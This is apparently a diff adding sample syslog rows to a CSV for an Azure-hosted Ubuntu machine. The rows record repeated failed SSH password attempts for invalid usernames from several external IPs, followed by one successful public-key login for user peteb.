+19365,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:14:04,UbuntuDevEnv,2019-06-26 14:14:04,auth,UbuntuDevEnv,info,Disconnected from invalid user display 68.183.50.149 port 33754 [preauth],5225,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,display,68.183.50.1,33754,,
+19366,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:14:04,UbuntuDevEnv,2019-06-26 14:14:04,auth,UbuntuDevEnv,info,Received disconnect from 68.183.50.149 port 33754:11: Bye Bye [preauth],5225,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,68.183.50.1,33754,,
+19367,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:14:10,UbuntuDevEnv,2019-06-26 14:14:09,auth,UbuntuDevEnv,info,Invalid user apache from 180.76.96.9 port 53480,5240,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,apache,180.76.96.9,53480,,
+19368,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:14:10,UbuntuDevEnv,2019-06-26 14:14:09,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=180.76.96.9,5240,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,180.76.96.9,,0,
+19369,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:14:10,UbuntuDevEnv,2019-06-26 14:14:09,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,5240,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+19370,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:14:12,UbuntuDevEnv,2019-06-26 14:14:11,auth,UbuntuDevEnv,info,Failed password for invalid user apache from 180.76.96.9 port 53480 ssh2,5240,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,apache,180.76.96.9,53480,,
+19371,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:14:12,UbuntuDevEnv,2019-06-26 14:14:11,auth,UbuntuDevEnv,info,Disconnected from invalid user apache 180.76.96.9 port 53480 [preauth],5240,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,apache,180.76.96.9,53480,,
+19372,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:14:12,UbuntuDevEnv,2019-06-26 14:14:11,auth,UbuntuDevEnv,info,Received disconnect from 180.76.96.9 port 53480:11: Bye Bye [preauth],5240,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,180.76.96.9,53480,,
+19373,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:14:52,UbuntuDevEnv,2019-06-26 14:14:51,auth,UbuntuDevEnv,info,Invalid user ram from 196.46.36.144 port 49873,5401,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ram,196.46.36.1,49873,,
+19374,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:14:52,UbuntuDevEnv,2019-06-26 14:14:51,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=196.46.36.144,5401,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,196.46.36.1,,0,
+19375,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:14:52,UbuntuDevEnv,2019-06-26 14:14:51,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,5401,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+19376,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:14:54,UbuntuDevEnv,2019-06-26 14:14:53,auth,UbuntuDevEnv,info,Failed password for invalid user ram from 196.46.36.144 port 49873 ssh2,5401,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ram,196.46.36.1,49873,,
+19377,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:14:54,UbuntuDevEnv,2019-06-26 14:14:53,auth,UbuntuDevEnv,info,Disconnected from invalid user ram 196.46.36.144 port 49873 [preauth],5401,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ram,196.46.36.1,49873,,
+19378,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:14:54,UbuntuDevEnv,2019-06-26 14:14:53,auth,UbuntuDevEnv,info,Received disconnect from 196.46.36.144 port 49873:11: Bye Bye [preauth],5401,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,196.46.36.1,49873,,
+19379,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:14:54,UbuntuDevEnv,2019-06-26 14:14:53,auth,UbuntuDevEnv,info,Invalid user lefty from 180.76.96.9 port 58590,5407,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,lefty,180.76.96.9,58590,,
+19380,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:14:54,UbuntuDevEnv,2019-06-26 14:14:53,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,5407,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+19381,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:14:54,UbuntuDevEnv,2019-06-26 14:14:53,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=180.76.96.9,5407,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,180.76.96.9,,0,
+19382,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:14:56,UbuntuDevEnv,2019-06-26 14:14:56,auth,UbuntuDevEnv,info,Failed password for invalid user lefty from 180.76.96.9 port 58590 ssh2,5407,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,lefty,180.76.96.9,58590,,
+19383,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:14:58,UbuntuDevEnv,2019-06-26 14:14:57,auth,UbuntuDevEnv,info,Disconnected from invalid user lefty 180.76.96.9 port 58590 [preauth],5407,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,lefty,180.76.96.9,58590,,
+19384,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:14:58,UbuntuDevEnv,2019-06-26 14:14:57,auth,UbuntuDevEnv,info,Received disconnect from 180.76.96.9 port 58590:11: Bye Bye [preauth],5407,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,180.76.96.9,58590,,
+19385,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:15:32,UbuntuDevEnv,2019-06-26 14:15:32,auth,UbuntuDevEnv,info,Invalid user louis from 68.183.50.149 port 50702,5642,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,louis,68.183.50.1,50702,,
+19386,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:15:32,UbuntuDevEnv,2019-06-26 14:15:32,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,5642,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+19387,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:15:32,UbuntuDevEnv,2019-06-26 14:15:32,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=68.183.50.149,5642,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,68.183.50.1,,0,
+19388,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:15:34,UbuntuDevEnv,2019-06-26 14:15:34,auth,UbuntuDevEnv,info,Failed password for invalid user louis from 68.183.50.149 port 50702 ssh2,5642,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,louis,68.183.50.1,50702,,
+19389,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:15:34,UbuntuDevEnv,2019-06-26 14:15:34,auth,UbuntuDevEnv,info,Received disconnect from 68.183.50.149 port 50702:11: Bye Bye [preauth],5642,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,68.183.50.1,50702,,
+19390,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:15:34,UbuntuDevEnv,2019-06-26 14:15:34,auth,UbuntuDevEnv,info,Disconnected from invalid user louis 68.183.50.149 port 50702 [preauth],5642,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,louis,68.183.50.1,50702,,
+19391,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:15:39,UbuntuDevEnv,2019-06-26 14:15:39,auth,UbuntuDevEnv,info,Invalid user roseline from 180.76.96.9 port 35464,5656,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,roseline,180.76.96.9,35464,,
+19392,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:15:39,UbuntuDevEnv,2019-06-26 14:15:39,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=180.76.96.9,5656,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,180.76.96.9,,0,
+19393,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:15:39,UbuntuDevEnv,2019-06-26 14:15:39,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,5656,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+19394,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:15:41,UbuntuDevEnv,2019-06-26 14:15:41,auth,UbuntuDevEnv,info,Failed password for invalid user roseline from 180.76.96.9 port 35464 ssh2,5656,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,roseline,180.76.96.9,35464,,
+19395,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:15:42,UbuntuDevEnv,2019-06-26 14:15:41,auth,UbuntuDevEnv,info,Received disconnect from 180.76.96.9 port 35464:11: Bye Bye [preauth],5656,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,180.76.96.9,35464,,
+19396,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:15:42,UbuntuDevEnv,2019-06-26 14:15:41,auth,UbuntuDevEnv,info,Disconnected from invalid user roseline 180.76.96.9 port 35464 [preauth],5656,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,roseline,180.76.96.9,35464,,
+19397,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:16:20,UbuntuDevEnv,2019-06-26 14:16:20,auth,UbuntuDevEnv,info,Invalid user chemin from 180.76.96.9 port 40564,5809,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,chemin,180.76.96.9,40564,,
+19398,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:16:20,UbuntuDevEnv,2019-06-26 14:16:20,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=180.76.96.9,5809,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,180.76.96.9,,0,
+19399,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:16:20,UbuntuDevEnv,2019-06-26 14:16:20,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,5809,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+19400,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:16:22,UbuntuDevEnv,2019-06-26 14:16:22,auth,UbuntuDevEnv,info,Failed password for invalid user chemin from 180.76.96.9 port 40564 ssh2,5809,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,chemin,180.76.96.9,40564,,
+19401,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:16:22,UbuntuDevEnv,2019-06-26 14:16:22,auth,UbuntuDevEnv,info,Disconnected from invalid user chemin 180.76.96.9 port 40564 [preauth],5809,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,chemin,180.76.96.9,40564,,
+19402,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:16:22,UbuntuDevEnv,2019-06-26 14:16:22,auth,UbuntuDevEnv,info,Received disconnect from 180.76.96.9 port 40564:11: Bye Bye [preauth],5809,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,180.76.96.9,40564,,
+19403,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:17:02,UbuntuDevEnv,2019-06-26 14:17:01,auth,UbuntuDevEnv,info,Invalid user user from 68.183.50.149 port 39418,5958,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user,68.183.50.1,39418,,
+19404,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:17:02,UbuntuDevEnv,2019-06-26 14:17:01,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,5958,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+19405,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:17:02,UbuntuDevEnv,2019-06-26 14:17:01,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=68.183.50.149,5958,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,68.183.50.1,,0,
+19406,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:17:04,UbuntuDevEnv,2019-06-26 14:17:04,auth,UbuntuDevEnv,info,Failed password for invalid user user from 68.183.50.149 port 39418 ssh2,5958,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user,68.183.50.1,39418,,
+19407,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:17:04,UbuntuDevEnv,2019-06-26 14:17:04,auth,UbuntuDevEnv,info,Disconnected from invalid user user 68.183.50.149 port 39418 [preauth],5958,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user,68.183.50.1,39418,,
+19408,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:17:04,UbuntuDevEnv,2019-06-26 14:17:04,auth,UbuntuDevEnv,info,Received disconnect from 68.183.50.149 port 39418:11: Bye Bye [preauth],5958,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,68.183.50.1,39418,,
+19409,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:17:05,UbuntuDevEnv,2019-06-26 14:17:05,auth,UbuntuDevEnv,info,Invalid user chloe from 180.76.96.9 port 45666,5971,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,chloe,180.76.96.9,45666,,
+19410,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:17:05,UbuntuDevEnv,2019-06-26 14:17:05,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,5971,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+19411,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:17:05,UbuntuDevEnv,2019-06-26 14:17:05,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=180.76.96.9,5971,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,180.76.96.9,,0,
+19412,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:17:07,UbuntuDevEnv,2019-06-26 14:17:06,auth,UbuntuDevEnv,info,Failed password for invalid user chloe from 180.76.96.9 port 45666 ssh2,5971,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,chloe,180.76.96.9,45666,,
+19413,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:17:09,UbuntuDevEnv,2019-06-26 14:17:08,auth,UbuntuDevEnv,info,Disconnected from invalid user chloe 180.76.96.9 port 45666 [preauth],5971,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,chloe,180.76.96.9,45666,,
+19414,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:17:09,UbuntuDevEnv,2019-06-26 14:17:08,auth,UbuntuDevEnv,info,Received disconnect from 180.76.96.9 port 45666:11: Bye Bye [preauth],5971,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,180.76.96.9,45666,,
+19415,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:17:29,UbuntuDevEnv,2019-06-26 14:17:29,auth,UbuntuDevEnv,info,Invalid user worker from 196.46.36.144 port 58040,6062,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,worker,196.46.36.1,58040,,
+19416,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:17:29,UbuntuDevEnv,2019-06-26 14:17:29,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=196.46.36.144,6062,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,196.46.36.1,,0,
+19417,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:17:29,UbuntuDevEnv,2019-06-26 14:17:29,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,6062,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+19418,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:17:31,UbuntuDevEnv,2019-06-26 14:17:31,auth,UbuntuDevEnv,info,Failed password for invalid user worker from 196.46.36.144 port 58040 ssh2,6062,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,worker,196.46.36.1,58040,,
+19419,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:17:31,UbuntuDevEnv,2019-06-26 14:17:31,auth,UbuntuDevEnv,info,Received disconnect from 196.46.36.144 port 58040:11: Bye Bye [preauth],6062,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,196.46.36.1,58040,,
+19420,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:17:31,UbuntuDevEnv,2019-06-26 14:17:31,auth,UbuntuDevEnv,info,Disconnected from invalid user worker 196.46.36.144 port 58040 [preauth],6062,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,worker,196.46.36.1,58040,,
+19421,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-07 21:20:03,UbuntuDevEnv,2019-06-07 21:20:03,auth,UbuntuDevEnv,info,Accepted publickey for peteb from 167.220.2.54 port 51751 ssh2: RSA SHA256:iMp4nnErVTXWJR2JKUEMSR8RuRXyPO4X/Ci6DX1piFM,4193,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Sucess,,167.220.2.5,51751,,
+19422,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-07 21:20:03,UbuntuDevEnv,2019-06-07 21:20:03,authpriv,UbuntuDevEnv,info,pam_unix(sshd:session): session opened for user peteb by (uid=0),4193,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,peteb,,,0,
+19423,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-07 21:20:03,UbuntuDevEnv,2019-06-07 21:20:03,auth,UbuntuDevEnv,info,New session 5 of user peteb.,1171,10.0.1.4,systemd-logind,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,peteb,,,,
+19424,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-07 21:20:04,UbuntuDevEnv,2019-06-07 21:20:03,authpriv,UbuntuDevEnv,info,pam_unix(systemd-user:session): session opened for user peteb by (uid=0),,10.0.1.4,systemd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,peteb,,,0,
